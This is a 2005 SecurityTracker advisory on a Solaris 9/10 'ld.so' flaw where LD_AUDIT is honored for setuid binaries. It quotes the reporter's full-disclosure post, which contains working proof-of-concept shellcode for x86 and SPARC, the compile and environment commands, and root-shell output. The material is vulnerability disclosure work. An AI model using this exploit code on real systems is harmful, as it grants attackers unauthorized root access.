Category: OS (UNIX) > ld.so.1
Vendors: Sun
Sun Solaris 'ld.so' LD_AUDIT Validation Error Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID: 1014317
SecurityTracker URL: http://securitytracker.com/id?1014317
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 28 2005
Impact: Execution of arbitrary code via local system, Root access via local system, User access via local system
Exploit Included: Yes
Version(s): 9, 10
Description: A vulnerability was reported in Sun Solaris in 'ld.so'. A local user may be able to gain elevated privileges.

The 'ld.so' runtime linker honors the user-controlled LD_AUDIT environment variable even when the program being started runs with elevated privileges, instead of discarding it as it does for other LD_* variables. A local user can compile arbitrary code as a shared library and set LD_AUDIT to point at it. When a set-user-ID (setuid) or set-group-ID (setgid) binary is then invoked, the loader maps the library into the privileged process and calls its audit entry point, so the arbitrary code runs with the binary's elevated privileges.

Przemyslaw Frasunek reported this vulnerability.

Impact:  A local user may be able to execute arbitrary code with elevated privileges.
Solution:  No solution was available at the time of this entry.
Vendor URL: www.sun.com/
Cause:  Access control error, Input validation error
Underlying OS:  UNIX (Solaris - SunOS)
Reported By:  Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 29 2005 (Sun Describes Workaround) Sun Solaris 'ld.so' LD_AUDIT Validation Error Lets Local Users Gain Elevated Privileges
Sun has described a workaround for Solaris 8 and 9.
Jul 20 2005 (Sun Issues Fix) Sun Solaris 'ld.so' LD_AUDIT Validation Error Lets Local Users Gain Elevated Privileges
Sun has issued fixes for some of the affected OS versions.



 Source Message Contents

Date:  Tue, 28 Jun 2005 01:11:58 +0200
From:  Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Subject:  [Full-disclosure] Solaris 9/10 ld.so fun

 

ld.so from Solaris 9 and 10 doesn't check the LD_AUDIT environment variable when
running s[ug]id binaries, allowing arbitrary code to be run with elevated
privileges. Well, I can't believe that such a trivial vulnerability exists in a
modern OS...

The following PoC code was tested on:

- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u

It does NOT work on:

SunOS 5.8 Generic_117350-02 sun4u sparc

Example on unpatched Solaris 10 (AMD64):

atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff"
"\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0"
"\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53"
"\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() { void (*f)(); f = (void*)sh; f(); return 3; }
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Solaris 9 on SPARC:

$ cat dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() { void (*f)(); f = (void*)sh; f(); return 3; }
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *


Copyright 2007, SecurityGlobal.net LLC